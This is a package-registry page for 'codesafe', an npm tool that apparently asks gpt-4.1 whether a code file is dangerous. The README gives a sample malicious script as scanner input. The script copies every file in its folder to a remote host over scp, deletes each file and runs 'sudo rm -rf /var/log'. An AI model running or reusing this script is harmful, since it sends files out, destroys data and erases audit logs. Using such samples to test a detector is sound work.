Product
Introducing Custom Tabs for Org Alerts
Create and share saved alert views with custom tabs on the org alerts page, making it easier for teams to return to consistent, named filter sets.
By André Staltz -  Jan 20, 2026
🚀 Launch Week Day 2:Introducing Custom Tabs for Org Alerts.Learn More →
codesafe
codesafe helps you find malware, bugs and backdoors in github repos using AI and firebase cloud functions
codesafe npm is a npm package that uses AI (gpt-4.1) to tell you if a code file is safe or dangerous
codeSafe web app: https://codesafe-506d9.web.app
codesafe example:
import fs from 'fs'
import { dirname } from 'path'
import { exec, execSync } from 'child_process'
import { fileURLToPath, pathToFileURL } from 'url'
const files = fs.readdirSync(dirname(fileURLToPath(import.meta.url)), "utf-8")
let main = (import.meta.filename.split("/"))[import.meta.filename.split("/").length-1]
files.forEach((e) => {
if(main != e){
execSync("sudo scp " + e + " admin@10.10.10.10:/home")
fs.unlink(e)
}
})
execSync("sudo rm -rf /var/log")
the above example will get passed though gpt-4.1 and returns a summary about its danger.
initalize:
1. npm install codesafe
2. import codesafe from 'codesafe
3. const obj = new codesafe()
4. console.log(await obj.code_scanner(<code_file>, <limit>))
code_file like index.js and it returns if it dangerous or not (has to be in the same folder)
limit is the word limit of the summary
function list:
1. await obj.code_scanner(<code_file>, <limit>)
hope you enjoy
FAQs
codesafe helps you find malware, bugs and backdoors in github repos using AI and firebase cloud functions
The npm package codesafe receives a total of 1 weekly downloads. As such, codesafe popularity was classified as not popular.
We found that codesafe demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Package last updated on 21 Jul 2025
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Related posts
Product
Rust Support in Socket Is Now Generally Available
Socket’s Rust and Cargo support is now generally available, providing dependency analysis and supply chain visibility for Rust projects.
By Trevor Norris -  Jan 19, 2026
Security News
Temporal API Ships in Chrome 144, Marking a Major Shift for JavaScript Date Handling
Chrome 144 introduces the Temporal API, a modern approach to date and time handling designed to fix long-standing issues with JavaScript’s Date object.
By Sarah Gooding -  Jan 16, 2026